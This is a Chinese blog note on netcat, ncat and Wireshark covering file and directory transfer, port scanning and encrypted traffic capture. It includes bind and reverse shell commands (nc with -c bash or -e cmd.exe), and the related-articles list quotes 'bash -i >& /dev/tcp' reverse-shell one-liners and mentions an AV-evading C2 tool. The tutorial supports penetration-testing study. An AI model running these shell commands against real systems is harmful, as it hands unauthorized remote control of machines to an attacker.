常见工具 nc Wireshark反弹shell

已于 2022-04-21 09:11:10 修改
阅读量1.3k 收藏 5
点赞数
分类专栏: 笔记 网络安全 文章标签: web安全 安全
于 2022-04-20 20:10:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42096378/article/details/124298594
版权

nc

常⽤⼯具
• 经常使⽤且功能强⼤
• 安全从业者必不可少的帮⼿
• Nc / ncat
• Wireshark
• Tcpdump

nc -lvp

使用nc 监听特定的端口

nc -nv ip port 连接特定ip下的指定端口

NETCAT ——NC
• ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧
• 侦听模式 / 传输模式
• telnet / 获取banner信息
• 传输⽂本信息
• 传输⽂件/⺫录
• 加密传输⽂件
• 远程控制/⽊⻢
• 加密所有流量
• 流媒体服务器
• 远程克隆硬盘

在这里插入图片描述
root@kali:/home/kali/Desktop# service ssh start
root@kali:/home/kali/Desktop# service apache2 start

在这里插入图片描述
在这里插入图片描述

NC——传输⽂本信息

• A:nc -l -p 4444
• B:nc –nv 1.1.1.1 4444
• 远程电⼦取证信息收集

在这里插入图片描述
在这里插入图片描述

NC——传输⽂件/目录

传输⽂件
• A:nc -lp 333 > 1.mp4
• B:nc -nv 1.1.1.1 333 < 1.mp4 –q 1
• 或
• A:nc -q 1 -lp 333 < a.mp4
• B: nc -nv 1.1.1.1 333 > 2.mp4
• 传输⺫录
• A:tar -cvf - music/ | nc -lp 333 –q 1
• B:nc -nv 1.1.1.1 333 | tar -xvf –
• 加密传⽂件
• A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
• B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

传输文件:
A:nc –lvp 12345 <1.txt
B:nc –nv 1.1.1.1 12345 > 1.txt

A方法
kali linux 监听特定端口 等待客户端主动携带数据 将接收到的数据保存写入特定文件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

b方法

在这里插入图片描述
在这里插入图片描述
此时 windows 监听端 不会自动断开tcp连接
在这里插入图片描述

传输目录

a方法
传输目录:
A: tar -cvf - ./ | nc -lvp 12345
B:nc –nv 1.1.1.1 12345 > ./ 3.zip

b方法
A: tar -cvf - ./ | nc -nv 192.168.226.146 666
B: >ncat.exe -lvp 666 -i 3 > .\new_2.zip

tar –tf 1.zip

使用-i参数可以设置在完成传输后睡眠多少秒后断开

在这里插入图片描述
在这里插入图片描述

传输文件 完成后 并不自动端口

断开

在这里插入图片描述
B方法
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

NC——端⼝扫描

• nc -nvz 1.1.1.1 1-65535
• nc –vnzu 1.1.1.1 1-1024

NC——NCAT Nc缺乏加密和⾝份验证的能⼒

• Ncat包含于nmap⼯具包中
• A:cat new_pow.ps1 | nc -nv 192.168.226.146 999 --ssl -i 3
• B:ncat -nv 1.1.1.1 333 --ssl

直接使用–ssl 命令

实现加密

WIRESHARK——实践 抓包对⽐nc、ncat加密与不加密的流量

• 抓包对⽐nc、ncat加密与不加密的流量

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

直接使用–ssl 命令

实现加密
cat new_pow.ps1 | nc -nv 192.168.226.146 999 --ssl -i 3

在这里插入图片描述
在这里插入图片描述

NC——远程控制 反弹shell

• 正向:
• A:nc -lp 333 -c bash
• B:nc 1.1.1.1 333
• 反向:
• A:nc -lp 333
• B:nc 1.1.1.1 333 -c bash
• 注:Windows⽤户把bash改成cmd;

-c /bin/bash 将linux端的权限交出

-e cmd.exe 将win端权限交出

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

最低0.47元/天 解锁文章
嗯光
关注
专栏目录
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
Openssl反弹加密shell
干铮的博客
03-14 908
使用Openssl反弹加密shell 进行渗透测试得后渗透阶段为了进行横向渗透,往往需要反弹shell,如果反弹shell,如果反弹shell都是明文传输,如果内网有IDS或者防护软件会进行流量分析,很快被发现,如果攻击流量回溯分析。就可以复现攻击得过程,此时整个攻击就会被暴漏出来。 使用wireshark抓包直接看到输入得命令返回信息,这些命令会被WAF或者IPS所检测所以需要对这些信息进行加密。 ...
nc.exe(nc反弹)
04-07
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。
shell 工具_ReverseTCPShell C2 反弹shell工具
weixin_39520880的博客
11-26 182
ReverseTCPShell C2是一款powershell编写的反弹shell工具,流量经过AES加密,payload通过三种混淆方式可绕过一些杀软的检测。测试:1. 在文件目录下启动powershell2. .ReverseTCP.ps1 ,启动程序会出现这个界面,功能介绍,设置好lhost和lport(监听地址及端口)Modules (模块) | - Show C2-Server Mo...
NC反弹的小demo
Quartz's Blog
07-19 518
一个有趣的NC反弹shell的demo#include #include #include #include #include void error(char *msg) { perror(msg); exit(0); } int main(int argc, char *argv[]) { int sockfd, portno
工具】Netcat(2)反弹shell
爱美食的Geek
02-21 2965
应用场景:某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。 1.反弹shell(bash) 反弹shell命令:bash -i >& /dev/tcp/ip/port 0>&1 pc接受netcat命令:nc -lvp port bash -i表示以交互模式运行bash shell。重定向符>&,如果在其后加文...
工具分享】-反弹Shell在线编写工具
一只爱吃橙子的羊
04-18 2192
反弹Shell在线编写工具(可以作为离线版)
linux反弹shell检测
08-22
特别关注与反弹 shell 相关的常见进程名称(如 netcat、nc、socat)。 3. 检查系统文件:使用查找命令(如 find)或相关工具,检查系统文件是否存在未知的、可疑的或异常的文件。特别关注与反弹 shell 相关的常见...
解密HTTPS流量并getshell和提权系统权限(Breach1.0)
曹振国的博客
07-28 1297
文章目录一、靶场的搭建及环境配置1.1 靶场介绍1.2 环境配置二、信息收集发现目标2.1 nmap扫描端口探测2.2 访问80端口(Web服务)2.3 访问跳转地址,并保存相关信息三、查看首页源码并解码得到密码3.1 回到首页,查看页面源码,3.2 解码得到账号,密码四、登录CMS通过邮件下载SSL证书的密钥库文件4.1 登录CMS4.2 下载wireshark流量包文件4.3 查看邮件找到SSL证书密钥库文件4.4 通过kali寻找该CMS的漏洞五、导入流量抓包文件、SSL证书到Wireshark5.1
NCrar.rar 反弹工具
10-20
NCrar.rar 反弹工具 网络应用 内网入侵必备~~
反弹shell工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
cmd反弹shell提权
10-24
cmd反弹shell提权
反弹shell
A_Alger的博客
09-09 291
多种姿势反弹shell bash attacker 监听 nc -lvvp 4444 victim 运行 bash -i >& /dev/tcp//4444 0>&1 nc 支持 -e 选项 attacker 监听 nc -lvvp 4444 victim 运行 nc 4444 -t -e /bin/bash python attacker 监听 nc -...
revshell 一款非常好用的生成反弹Shell命令的工具
ak.Gh0st的博客
08-09 971
revshell是一个由Go语言编写的反弹Shell工具,它是Reverse Shell Generator的命令行版本,旨在帮助安全研究人员和渗透测试人员在需要与目标主机建立反向连接时快速生成相应的Shell代码。目前支持的类型:除了支持多种Shell类型外,revshell还可以运行在多个操作系统平台上,包括Mac、Linux和Windows。这使得用户可以在不同的环境中使用revshell来生成适用于目标主机操作系统的反弹Shell代码,提高了工具的灵活性和适用性。
JavaScript学习笔记(二十)DOM动画效果
最新发布
2401_84254011的博客
04-28 561
/0 ~ 100}else{//100// 3. 速度取整;}else{}else{// 4. 终止条件;} , 50)
linux使用nc 反弹shell
qq_30890029的博客
04-20 516
但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决。本机【攻击机】开启nc监听nc -lvnp 9999。受害机器反弹shell《两种常见反弹shell
反弹shell方法
Sea_Sand息禅
04-06 813
1、bash反弹shell kali ip:192.168.10.130 目标机上执行命令:bash -i >& /dev/tcp/192.168.10.130/8888 0>&1 kali机执行命令:nc -lvp 8888 bash -i:在本地打开一个bash终端 linux文件描述符:linux shell下有三种标准的文件描述符,分别如下: 0...
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 4728
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
Wireshark网络抓包工具详解及应用
"Wireshark 是一款强大的网络抓包工具,用于捕获和分析网络包,适用于各种场景,包括故障排查、安全审计、协议学习等。它支持多种平台,能够实时捕捉不同网络接口的包,并能打开和导出多种格式的捕包文件。Wireshark...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值